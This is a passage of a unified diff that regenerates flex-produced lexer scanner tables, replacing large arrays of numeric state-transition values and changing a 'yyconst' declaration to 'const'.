85, 82, 82, 85, 82, 82, +- 85, 82, 82, 85, 82, 913, 912, 858, 82, 85, +- 82, 82, 85, 82, 82, 85, 82, 82, 85, 82, +- +- 867, 866, 911, 862, 910, 860, 82, 85, 82, 859, +- 82, 85, 82, 865, 909, 861, 908, 863, 868, 907, +- 864, 82, 85, 82, 82, 85, 82, 82, 85, 82, +- 906, 869, 905, 904, 870, 82, 85, 82, 82, 85, +- 82, 82, 85, 82, 903, 902, 872, 873, 82, 85, +- 82, 82, 85, 82, 82, 85, 82, 82, 85, 82, +- 871, 82, 85, 82, 901, 875, 900, 899, 874, 82, +- 85, 82, 82, 85, 82, 898, 82, 85, 82, 876, +- 82, 85, 82, 82, 85, 82, 82, 85, 82, 897, +- 896, 82, 85, 82, 920, 82, 85, 82, 82, 85, +- +- 82, 895, 927, 894, 893, 919, 82, 85, 82, 82, +- 85, 82, 922, 923, 926, 82, 85, 82, 921, 892, +- 925, 891, 890, 928, 887, 886, 924, 82, 85, 82, +- 82, 85, 82, 82, 85, 82, 82, 85, 82, 82, +- 85, 82, 885, 884, 930, 883, 882, 929, 82, 85, +- 82, 881, 931, 82, 85, 82, 82, 85, 82, 880, +- 932, 82, 85, 82, 82, 85, 82, 82, 85, 82, +- 82, 85, 82, 82, 85, 82, 82, 85, 82, 82, +- 85, 82, 82, 85, 82, 82, 85, 82, 82, 85, +- 82, 879, 878, 976, 877, 970, 82, 85, 82, 857, +- +- 856, 977, 855, 975, 969, 854, 973, 971, 853, 978, +- 82, 85, 82, 972, 82, 85, 82, 852, 974, 82, +- 85, 82, 82, 85, 82, 851, 82, 85, 82, 82, +- 85, 82, 82, 85, 82, 82, 85, 82, 82, 85, +- 82, 850, 849, 1013, 848, 1020, 82, 85, 82, 82, +- 85, 82, 82, 85, 82, 82, 85, 82, 847, 846, +- 1014, 845, 1018, 82, 85, 82, 1019, 1016, 82, 85, +- 82, 1015, 1017, 82, 85, 82, 82, 85, 82, 82, +- 85, 82, 82, 85, 82, 844, 843, 1053, 842, 1055, +- 82, 85, 82, 841, 1054, 82, 85, 82, 82, 85, +- +- 82, 1056, 82, 85, 82, 82, 85, 82, 1057, 82, +- 85, 82, 82, 85, 82, 82, 85, 82, 840, 1058, +- 82, 85, 82, 839, 1059, 82, 85, 82, 838, 837, +- 1123, 836, 82, 85, 82, 835, 831, 1089, 830, 1091, +- 829, 1090, 828, 1093, 1092, 827, 826, 1094, 1122, 82, +- 85, 82, 82, 85, 82, 82, 85, 82, 82, 85, +- 82, 82, 85, 82, 82, 85, 82, 82, 85, 82, +- 82, 85, 82, 82, 85, 82, 1124, 1125, 82, 85, +- 82, 82, 85, 82, 82, 85, 82, 82, 85, 82, +- 1147, 82, 85, 82, 82, 85, 82, 825, 824, 1150, +- +- 82, 85, 82, 823, 1148, 82, 85, 82, 1149, 82, +- 85, 82, 1170, 1215, 822, 821, 1171, 82, 85, 82, +- 82, 85, 82, 1172, 82, 85, 82, 820, 1191, 1190, +- 82, 85, 82, 1205, 819, 818, 1206, 82, 85, 82, +- 817, 1214, 816, 1222, 82, 85, 82, 82, 85, 82, +- 815, 1221, 814, 787, 786, 785, 784, 783, 782, 781, +- 780, 1228, 779, 778, 777, 776, 1226, 775, 774, 773, +- 772, 771, 770, 769, 1230, 1232, 768, 767, 766, 765, +- 764, 763, 762, 761, 760, 759, 752, 751, 750, 749, +- 748, 747, 746, 1233, 45, 45, 45, 45, 49, 49, +- +- 49, 49, 75, 75, 75, 75, 78, 78, 78, 78, +- 85, 85, 94, 94, 182, 745, 182, 182, 744, 743, +- 713, 712, 711, 710, 709, 708, 707, 706, 705, 704, +- 703, 702, 701, 700, 699, 698, 697, 694, 693, 692, ++ 24, 23, 25, 26, 23, 27, 23, 23, 23, 23, ++ 23, 23, 23, 12, 23, 23, 28, 29, 30, 31, ++ 32, 23, 23, 33, 23, 34, 23, 35, 36, 37, ++ 23, 38, 39, 40, 41, 42, 23, 23, 23, 43, ++ 44, 48, 47, 51, 45, 49, 51, 72, 78, 351, ++ 52, 73, 75, 52, 53, 81, 76, 88, 74, 81, ++ 82, 89, 83, 83, 84, 87, 84, 352, 54, 84, ++ ++ 85, 84, 86, 86, 182, 182, 84, 87, 84, 84, ++ 87, 84, 55, 84, 87, 84, 130, 79, 150, 232, ++ 131, 56, 151, 57, 58, 1146, 59, 60, 233, 61, ++ 62, 63, 97, 64, 65, 66, 67, 68, 69, 70, ++ 71, 90, 255, 83, 83, 1152, 99, 84, 87, 84, ++ 91, 92, 84, 87, 84, 78, 256, 93, 84, 87, ++ 84, 100, 84, 87, 84, 98, 93, 84, 87, 84, ++ 84, 87, 84, 84, 87, 84, 189, 189, 91, 92, ++ 84, 87, 84, 84, 93, 84, 84, 87, 84, 84, ++ 87, 84, 93, 1153, 79, 94, 84, 87, 84, 101, ++ ++ 84, 87, 84, 102, 108, 105, 103, 176, 84, 104, ++ 84, 177, 109, 106, 110, 84, 87, 84, 230, 111, ++ 113, 336, 107, 84, 87, 84, 1154, 112, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 114, 337, 179, ++ 234, 117, 118, 180, 119, 115, 81, 231, 116, 235, ++ 81, 120, 547, 121, 281, 322, 122, 84, 87, 84, ++ 84, 87, 84, 235, 123, 548, 323, 128, 154, 125, ++ 126, 124, 84, 87, 84, 127, 132, 133, 134, 135, ++ 136, 137, 138, 139, 140, 130, 1155, 141, 142, 131, ++ 143, 144, 1156, 145, 146, 147, 148, 149, 84, 87, ++ ++ 84, 84, 87, 84, 156, 226, 155, 84, 87, 84, ++ 158, 1157, 84, 87, 84, 84, 87, 84, 238, 105, ++ 227, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 936, 331, 157, 84, 87, 84, 228, 937, 161, 102, ++ 236, 108, 103, 332, 237, 104, 333, 111, 239, 109, ++ 160, 110, 150, 162, 159, 163, 151, 345, 165, 84, ++ 87, 84, 346, 164, 84, 87, 84, 1158, 112, 84, ++ 87, 84, 84, 183, 84, 166, 167, 84, 87, 84, ++ 245, 84, 115, 84, 246, 116, 84, 87, 84, 168, ++ 188, 188, 176, 247, 189, 189, 177, 169, 84, 87, ++ ++ 84, 84, 170, 84, 545, 117, 171, 121, 119, 546, ++ 122, 172, 187, 187, 805, 120, 806, 179, 123, 91, ++ 92, 180, 638, 125, 175, 173, 639, 174, 126, 84, ++ 87, 84, 84, 127, 84, 86, 86, 1159, 241, 84, ++ 87, 84, 184, 185, 242, 243, 191, 91, 92, 84, ++ 87, 84, 1160, 84, 87, 84, 84, 87, 84, 84, ++ 87, 84, 84, 87, 84, 84, 87, 84, 908, 909, ++ 184, 185, 192, 193, 194, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 196, 1161, 1162, 197, 84, 87, 84, ++ ++ 84, 87, 84, 195, 84, 87, 84, 84, 87, 84, ++ 1163, 198, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 199, 202, 201, ++ 200, 1164, 1165, 203, 84, 87, 84, 204, 354, 84, ++ 87, 84, 84, 87, 84, 208, 206, 355, 205, 207, ++ 211, 84, 87, 84, 209, 710, 84, 87, 84, 210, ++ 711, 213, 84, 87, 84, 212, 325, 326, 216, 327, ++ 1166, 215, 84, 87, 84, 84, 87, 84, 214, 84, ++ 87, 84, 1167, 217, 218, 249, 422, 250, 770, 423, ++ 251, 219, 252, 84, 87, 84, 84, 87, 84, 84, ++ ++ 87, 84, 771, 220, 221, 84, 87, 84, 84, 87, ++ 84, 1168, 222, 84, 87, 84, 1169, 224, 1170, 1171, ++ 225, 223, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 260, 84, 87, ++ 84, 1172, 1177, 262, 84, 87, 84, 264, 261, 263, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 84, ++ 87, 84, 265, 84, 87, 84, 84, 87, 84, 1178, ++ 269, 1179, 1180, 266, 84, 87, 84, 268, 84, 87, ++ 84, 1181, 208, 270, 267, 1182, 273, 272, 84, 87, ++ 84, 182, 182, 450, 1183, 271, 1184, 451, 91, 92, ++ ++ 452, 274, 1185, 276, 188, 282, 1186, 84, 283, 283, ++ 275, 277, 1188, 189, 189, 1189, 279, 187, 187, 1187, ++ 214, 92, 278, 1190, 91, 92, 91, 92, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 280, 84, 87, ++ 84, 84, 87, 84, 1191, 284, 1192, 1193, 286, 92, ++ 1194, 287, 91, 92, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 1195, ++ 1199, 288, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 285, 84, 87, 84, 289, 84, 87, 84, 84, ++ 87, 84, 84, 87, 84, 84, 87, 84, 293, 84, ++ ++ 87, 84, 1200, 290, 84, 87, 84, 291, 1201, 1202, ++ 292, 294, 297, 84, 87, 84, 295, 84, 87, 84, ++ 298, 84, 87, 84, 1203, 296, 84, 87, 84, 299, ++ 300, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 1204, 301, 84, 87, 84, 84, 87, ++ 84, 1205, 302, 1206, 1207, 303, 1208, 304, 84, 87, ++ 84, 84, 87, 84, 307, 1209, 305, 306, 84, 87, ++ 84, 84, 87, 84, 1210, 84, 87, 84, 84, 87, ++ 84, 341, 308, 1211, 1212, 309, 313, 342, 311, 310, ++ 1213, 1214, 312, 1215, 1218, 343, 314, 84, 87, 84, ++ ++ 84, 87, 84, 315, 84, 87, 84, 1219, 317, 318, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 316, ++ 84, 87, 84, 84, 87, 84, 1220, 1221, 363, 84, ++ 87, 84, 1222, 365, 1223, 364, 1224, 84, 87, 84, ++ 84, 87, 84, 1225, 367, 84, 87, 84, 366, 84, ++ 87, 84, 1226, 84, 87, 84, 1227, 1228, 368, 84, ++ 87, 84, 1229, 370, 84, 87, 84, 371, 84, 87, ++ 84, 84, 87, 84, 369, 372, 1230, 851, 84, 87, ++ 84, 852, 373, 374, 84, 87, 84, 84, 1233, 84, ++ 283, 283, 84, 853, 84, 283, 283, 1234, 1235, 375, ++ ++ 376, 1236, 1237, 185, 1238, 1239, 378, 1242, 1243, 379, ++ 377, 380, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 1244, 1245, 84, 87, 84, 1246, ++ 384, 185, 386, 1249, 381, 84, 87, 84, 84, 87, ++ 84, 385, 84, 87, 84, 1250, 1251, 387, 388, 389, ++ 390, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 1253, 84, 87, 84, 1255, 383, 84, 87, 84, 84, ++ 87, 84, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 1257, 190, 391, 84, 87, 84, 1145, 1144, 393, 84, ++ ++ 87, 84, 392, 394, 395, 84, 87, 84, 84, 87, ++ 84, 1143, 1142, 396, 1141, 399, 1140, 1139, 400, 84, ++ 87, 84, 1138, 397, 1137, 401, 1136, 1135, 398, 84, ++ 87, 84, 84, 87, 84, 402, 84, 87, 84, 404, ++ 1134, 406, 1133, 405, 84, 87, 84, 84, 87, 84, ++ 403, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 84, 87, 84, 1132, 1131, 409, 407, ++ 1130, 408, 84, 87, 84, 84, 87, 84, 772, 773, ++ 410, 84, 87, 84, 84, 87, 84, 774, 412, 84, ++ 87, 84, 1129, 775, 413, 84, 87, 84, 411, 84, ++ ++ 87, 84, 84, 87, 84, 84, 87, 84, 1128, 414, ++ 460, 1127, 415, 84, 87, 84, 1126, 462, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 1125, 1124, 464, ++ 461, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 1123, 463, 84, 87, 84, 1122, 465, 84, 87, 84, ++ 1121, 467, 1120, 1112, 466, 84, 87, 84, 84, 87, ++ 84, 1111, 1110, 398, 1109, 468, 1108, 1107, 472, 1106, ++ 469, 1105, 405, 1104, 470, 84, 87, 84, 1103, 412, ++ 1102, 474, 1101, 1100, 471, 1099, 1098, 473, 84, 87, ++ 84, 475, 1097, 1096, 478, 1095, 1094, 476, 1093, 1092, ++ ++ 477, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 479, 84, 87, 84, 84, 87, 84, ++ 480, 84, 87, 84, 84, 87, 84, 482, 484, 1091, ++ 1090, 485, 1089, 1088, 481, 84, 87, 84, 486, 483, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 84, ++ 87, 84, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 1087, 487, 84, 87, 84, 84, 87, 84, 1086, ++ 1085, 488, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 1084, 492, 1075, 1074, 489, 1073, 493, ++ ++ 84, 87, 84, 490, 1072, 1071, 491, 84, 87, 84, ++ 1070, 1069, 495, 84, 87, 84, 494, 84, 87, 84, ++ 497, 84, 87, 84, 499, 84, 87, 84, 1068, 496, ++ 84, 87, 84, 84, 87, 84, 1067, 1066, 498, 1065, ++ 84, 87, 84, 1064, 1063, 500, 84, 87, 84, 1062, ++ 1061, 502, 1060, 1059, 503, 84, 87, 84, 1058, 501, ++ 84, 87, 84, 1057, 550, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 1056, 1055, 84, ++ 87, 84, 1054, 551, 552, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 555, 1053, 1052, 553, 1051, 84, ++ ++ 87, 84, 1050, 1049, 554, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 557, 556, 558, 559, 84, 87, ++ 84, 84, 87, 84, 566, 84, 87, 84, 1048, 494, ++ 1047, 1046, 569, 570, 571, 567, 560, 1045, 1044, 561, ++ 562, 563, 572, 1034, 1033, 573, 84, 87, 84, 574, ++ 575, 568, 564, 576, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 1032, 1031, 565, 84, 87, 84, 578, ++ 84, 87, 84, 1030, 577, 84, 87, 84, 1029, 1028, ++ 579, 84, 87, 84, 580, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 84, ++ 87, 84, 84, 87, 84, 582, 1027, 581, 84, 87, ++ 84, 84, 87, 84, 594, 595, 584, 84, 87, 84, ++ 1026, 1025, 583, 84, 87, 84, 84, 87, 84, 1024, ++ 596, 597, 585, 1023, 1022, 598, 1021, 586, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 588, 1020, 589, ++ 84, 87, 84, 587, 84, 87, 84, 84, 87, 84, ++ 1019, 590, 84, 87, 84, 84, 87, 84, 643, 84, ++ 87, 84, 1018, 1017, 591, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 646, 1016, 1015, ++ ++ 644, 1014, 645, 1013, 647, 648, 649, 84, 87, 84, ++ 1012, 1011, 651, 84, 87, 84, 84, 87, 84, 84, ++ 87, 84, 653, 84, 87, 84, 84, 87, 84, 1010, ++ 1009, 654, 650, 658, 84, 87, 84, 652, 1008, 655, ++ 661, 84, 87, 84, 84, 87, 84, 659, 84, 87, ++ 84, 657, 660, 656, 1007, 662, 1006, 1005, 663, 84, ++ 87, 84, 84, 87, 84, 665, 664, 84, 87, 84, ++ 84, 87, 84, 1004, 84, 87, 84, 669, 84, 87, ++ 84, 1003, 668, 84, 87, 84, 1002, 1001, 666, 84, ++ 87, 84, 667, 670, 84, 87, 84, 84, 87, 84, ++ ++ 84, 87, 84, 671, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 989, 672, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 674, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 673, 988, 676, 84, 87, 84, 675, 987, 677, 84, ++ 87, 84, 84, 87, 84, 678, 84, 87, 84, 84, ++ 87, 84, 84, 87, 84, 986, 985, 731, 984, 983, ++ 732, 84, 87, 84, 84, 87, 84, 729, 982, 730, ++ 981, 733, 84, 87, 84, 980, 979, 734, 84, 87, ++ 84, 84, 87, 84, 736, 978, 735, 84, 87, 84, ++ ++ 84, 87, 84, 737, 84, 87, 84, 84, 87, 84, ++ 977, 738, 84, 87, 84, 743, 739, 744, 745, 976, ++ 747, 746, 975, 974, 741, 973, 740, 84, 87, 84, ++ 742, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 84, 87, 84, 749, 972, 750, 971, ++ 970, 748, 969, 753, 84, 87, 84, 968, 751, 967, ++ 966, 752, 84, 87, 84, 84, 87, 84, 755, 754, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 965, ++ 757, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 84, 87, 84, 964, 963, 756, 84, ++ ++ 87, 84, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 758, 84, 87, 84, 84, 87, ++ 84, 759, 84, 87, 84, 84, 87, 84, 962, 809, ++ 961, 807, 84, 87, 84, 960, 959, 808, 958, 810, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 957, ++ 956, 811, 84, 87, 84, 84, 87, 84, 955, 954, ++ 812, 938, 935, 813, 934, 84, 87, 84, 933, 84, ++ 87, 84, 84, 87, 84, 818, 819, 84, 87, 84, ++ 814, 84, 87, 84, 932, 815, 820, 931, 84, 87, ++ 84, 84, 87, 84, 816, 930, 929, 817, 823, 824, ++ ++ 928, 927, 821, 84, 87, 84, 822, 84, 87, 84, ++ 84, 87, 84, 84, 87, 84, 926, 826, 827, 925, ++ 825, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 924, 923, 830, 831, 84, 87, 84, 922, 829, 84, ++ 87, 84, 84, 87, 84, 921, 828, 84, 87, 84, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 920, ++ 832, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 919, 918, 877, 84, 87, 84, 84, 87, 84, 917, ++ 916, 84, 87, 84, 84, 87, 84, 915, 914, 879, ++ 882, 878, 913, 912, 886, 84, 87, 84, 911, 880, ++ ++ 910, 887, 907, 906, 881, 883, 885, 84, 87, 84, ++ 905, 884, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 904, 903, 888, 84, 87, 84, 902, 889, 84, ++ 87, 84, 901, 900, 890, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 899, 898, 892, 893, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 891, 84, 87, 84, 897, 895, 876, 875, 894, 84, ++ 87, 84, 84, 87, 84, 84, 87, 84, 874, 896, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 84, ++ 87, 84, 873, 872, 940, 871, 84, 87, 84, 84, ++ ++ 87, 84, 84, 87, 84, 939, 948, 870, 943, 84, ++ 87, 84, 942, 84, 87, 84, 869, 944, 941, 947, ++ 84, 87, 84, 946, 84, 87, 84, 949, 868, 945, ++ 867, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 866, 950, 951, 84, 87, 84, 84, ++ 87, 84, 865, 952, 84, 87, 84, 84, 87, 84, ++ 864, 953, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 863, 84, 87, 84, 84, 87, 84, ++ 862, 991, 861, 860, 998, 84, 87, 84, 994, 84, ++ ++ 87, 84, 990, 999, 997, 992, 859, 995, 858, 993, ++ 857, 1000, 84, 87, 84, 84, 87, 84, 856, 996, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 84, ++ 87, 84, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 855, 1035, 854, 850, 1043, 84, ++ 87, 84, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 1036, 84, 87, 84, 1041, 849, 848, 1038, 1042, ++ 1039, 847, 1037, 846, 845, 1040, 84, 87, 84, 84, ++ 87, 84, 84, 87, 84, 84, 87, 84, 844, 843, ++ 1076, 842, 1078, 84, 87, 84, 841, 1077, 840, 839, ++ ++ 1079, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 838, 84, 87, 84, 1080, 84, 87, 84, 837, 1081, ++ 84, 87, 84, 836, 84, 87, 84, 835, 1082, 84, ++ 87, 84, 834, 1083, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 1117, ++ 1148, 1115, 84, 87, 84, 1114, 1113, 1116, 1118, 84, ++ 87, 84, 84, 87, 84, 84, 87, 84, 833, 804, ++ 1147, 1119, 84, 87, 84, 84, 87, 84, 84, 87, ++ 84, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 803, 802, 1150, 801, 1149, 800, 799, 1151, 798, 797, ++ ++ 1173, 84, 87, 84, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 796, 1174, 795, 1176, 84, 87, 84, ++ 794, 793, 1175, 84, 87, 84, 84, 87, 84, 1196, ++ 84, 87, 84, 1197, 84, 87, 84, 84, 87, 84, ++ 84, 87, 84, 1241, 84, 87, 84, 84, 87, 84, ++ 792, 1198, 791, 790, 1217, 1216, 84, 87, 84, 1231, ++ 84, 87, 84, 84, 87, 84, 84, 87, 84, 789, ++ 788, 1248, 1232, 1240, 787, 786, 785, 784, 783, 782, ++ 1247, 781, 780, 779, 1254, 778, 777, 776, 769, 768, ++ 1252, 767, 766, 765, 764, 763, 762, 761, 1258, 760, ++ ++ 1256, 728, 727, 726, 725, 724, 723, 722, 721, 720, ++ 719, 718, 1259, 46, 46, 46, 46, 50, 50, 50, ++ 50, 77, 77, 77, 77, 80, 80, 80, 80, 87, ++ 87, 96, 96, 186, 717, 186, 186, 716, 715, 714, ++ 713, 712, 709, 708, 707, 706, 705, 704, 703, 702, ++ 701, 700, 699, 698, 697, 696, 695, 694, 693, 692, + 691, 690, 689, 688, 687, 686, 685, 684, 683, 682, +- 681, 680, 679, 678, 677, 676, 675, 674, 673, 672, +- 671, 670, 669, 668, 667, 666, 665, 664, 629, 628, +- 627, 624, 623, 622, 621, 620, 619, 618, 617, 616, +- 615, 614, 613, 612, 611, 610, 609, 608, 607, 606, +- 605, 604, 603, 602, 601, 600, 599, 598, 597, 596, +- +- 595, 594, 593, 592, 591, 590, 589, 588, 587, 586, +- 580, 579, 538, 533, 532, 531, 530, 529, 528, 527, +- 526, 525, 524, 523, 522, 521, 520, 519, 518, 517, +- 516, 515, 514, 513, 512, 511, 510, 509, 508, 507, +- 506, 505, 504, 503, 502, 501, 500, 499, 498, 497, +- 496, 495, 494, 493, 450, 449, 448, 447, 446, 445, +- 444, 440, 439, 438, 437, 436, 435, 434, 433, 432, +- 431, 430, 429, 428, 427, 426, 425, 424, 423, 422, +- 421, 420, 419, 418, 417, 416, 415, 412, 411, 410, +- 409, 408, 407, 374, 355, 354, 353, 352, 351, 350, +- +- 349, 346, 343, 342, 341, 340, 337, 333, 332, 331, +- 328, 327, 323, 322, 321, 317, 314, 313, 312, 177, +- 230, 174, 254, 149, 253, 252, 249, 248, 243, 239, +- 235, 224, 1234, 1234, 177, 174, 150, 149, 126, 93, +- 1234, 1234, 72, 46, 11, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, ++ 681, 680, 679, 642, 641, 640, 637, 636, 635, 634, ++ 633, 632, 631, 630, 629, 628, 627, 626, 625, 624, ++ 623, 622, 621, 620, 619, 618, 617, 616, 615, 614, ++ ++ 613, 612, 611, 610, 609, 608, 607, 606, 605, 604, ++ 603, 602, 601, 600, 599, 593, 592, 549, 544, 543, ++ 542, 541, 540, 539, 538, 537, 536, 535, 534, 533, ++ 532, 531, 530, 529, 528, 527, 526, 525, 524, 523, ++ 522, 521, 520, 519, 518, 517, 516, 515, 514, 513, ++ 512, 511, 510, 509, 508, 507, 506, 505, 504, 459, ++ 458, 457, 456, 455, 454, 453, 449, 448, 447, 446, ++ 445, 444, 443, 442, 441, 440, 439, 438, 437, 436, ++ 435, 434, 433, 432, 431, 430, 429, 428, 427, 426, ++ 425, 424, 421, 420, 419, 418, 417, 416, 382, 362, ++ ++ 361, 360, 359, 358, 357, 356, 353, 350, 349, 348, ++ 347, 344, 340, 339, 338, 335, 334, 330, 329, 328, ++ 324, 321, 320, 319, 181, 235, 178, 259, 152, 258, ++ 257, 254, 253, 248, 244, 240, 229, 1260, 1260, 181, ++ 178, 153, 152, 129, 95, 1260, 1260, 74, 47, 11, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, + +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234 ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260 + } ; + +-static yyconst flex_int16_t yy_chk[2916] = ++static const flex_int16_t yy_chk[3021] = + { 0, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +@@ -1169,320 +1177,331 @@ static yyconst flex_int16_t yy_chk[2916] + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 2, 4, 4, 5, 2, 4, 6, 8, 15, 245, ++ 2, 4, 4, 5, 2, 4, 6, 8, 15, 250, + 5, 8, 10, 6, 7, 16, 10, 19, 10, 16, +- 17, 19, 17, 17, 23, 23, 23, 245, 7, 18, ++ 17, 19, 17, 17, 23, 23, 23, 250, 7, 18, + +- 18, 18, 18, 18, 80, 80, 24, 24, 24, 25, +- 25, 25, 7, 132, 26, 26, 26, 15, 27, 27, +- 27, 7, 132, 7, 7, 75, 7, 7, 26, 7, +- 7, 7, 24, 7, 7, 1088, 7, 7, 7, 7, +- 7, 20, 25, 20, 20, 43, 28, 28, 28, 43, +- 20, 20, 29, 29, 29, 184, 184, 20, 30, 30, +- 30, 32, 32, 32, 75, 27, 20, 31, 31, 31, +- 33, 33, 33, 47, 34, 34, 34, 47, 20, 20, +- 35, 35, 35, 131, 20, 70, 82, 28, 82, 70, +- 28, 133, 20, 28, 1096, 20, 36, 36, 36, 29, +- +- 133, 31, 73, 85, 30, 85, 73, 32, 34, 31, +- 233, 31, 131, 30, 37, 37, 37, 33, 78, 38, +- 38, 38, 78, 39, 39, 39, 1097, 233, 35, 40, +- 40, 40, 144, 127, 41, 41, 41, 127, 53, 53, +- 53, 54, 54, 54, 135, 36, 144, 1098, 36, 55, +- 55, 55, 63, 63, 63, 37, 37, 38, 37, 1099, +- 38, 83, 83, 83, 177, 37, 825, 825, 38, 39, +- 41, 40, 53, 177, 135, 38, 40, 44, 44, 44, +- 44, 44, 44, 44, 44, 44, 63, 1100, 44, 44, +- 54, 44, 44, 55, 44, 44, 44, 44, 44, 56, +- +- 56, 56, 134, 57, 57, 57, 134, 59, 59, 59, +- 58, 58, 58, 1102, 60, 60, 60, 61, 61, 61, +- 224, 1103, 62, 62, 62, 64, 64, 64, 65, 65, +- 65, 224, 1104, 56, 66, 66, 66, 68, 68, 68, +- 56, 57, 1105, 56, 58, 59, 56, 94, 94, 94, +- 57, 60, 58, 129, 58, 61, 62, 58, 1106, 1109, +- 60, 67, 67, 67, 62, 240, 65, 147, 129, 62, +- 240, 147, 66, 64, 64, 66, 66, 179, 66, 179, +- 69, 69, 69, 68, 129, 66, 84, 68, 84, 84, +- 84, 172, 238, 88, 88, 172, 84, 84, 238, 67, +- +- 88, 88, 67, 67, 89, 89, 238, 175, 89, 89, +- 67, 175, 535, 95, 95, 95, 535, 67, 69, 96, +- 96, 96, 69, 319, 84, 84, 319, 69, 88, 88, +- 95, 97, 97, 97, 98, 98, 98, 99, 99, 99, +- 100, 100, 100, 96, 101, 101, 101, 102, 102, 102, +- 1110, 1111, 97, 103, 103, 103, 104, 104, 104, 105, +- 105, 105, 106, 106, 106, 107, 107, 107, 108, 108, +- 108, 99, 1112, 1113, 100, 109, 109, 109, 110, 110, +- 110, 98, 111, 111, 111, 112, 112, 112, 247, 1114, +- 101, 113, 113, 113, 114, 114, 114, 247, 1116, 102, +- +- 115, 115, 115, 105, 104, 103, 1117, 1118, 106, 116, +- 116, 116, 107, 117, 117, 117, 118, 118, 118, 108, +- 111, 109, 181, 110, 181, 1120, 113, 112, 119, 119, +- 119, 1121, 112, 120, 120, 120, 121, 121, 121, 137, +- 115, 114, 122, 122, 122, 137, 137, 117, 123, 123, +- 123, 124, 124, 124, 1126, 449, 116, 115, 125, 125, +- 